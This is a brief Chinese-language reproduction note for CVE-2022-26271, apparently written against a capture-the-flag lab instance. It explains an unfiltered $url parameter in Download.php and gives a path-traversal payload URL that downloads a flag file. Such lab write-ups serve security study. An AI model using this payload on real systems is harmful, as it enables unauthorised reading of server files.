CVE-2022-26271

CVE-2022-26271复现

漏洞分析
在\upload\application\index\controller\Download.php里面有一个文件操作函数，其中$url是用户可控制参数，没有过滤，$ourput_filename是要输出的文件名

构造payload：
https://eci-2zegg56pa08ql8s0k42t.cloudeci1.ichunqiu.com/index/download/index?name=index.php&url=../../../../../../../flag
页面会自动下载index.php文件,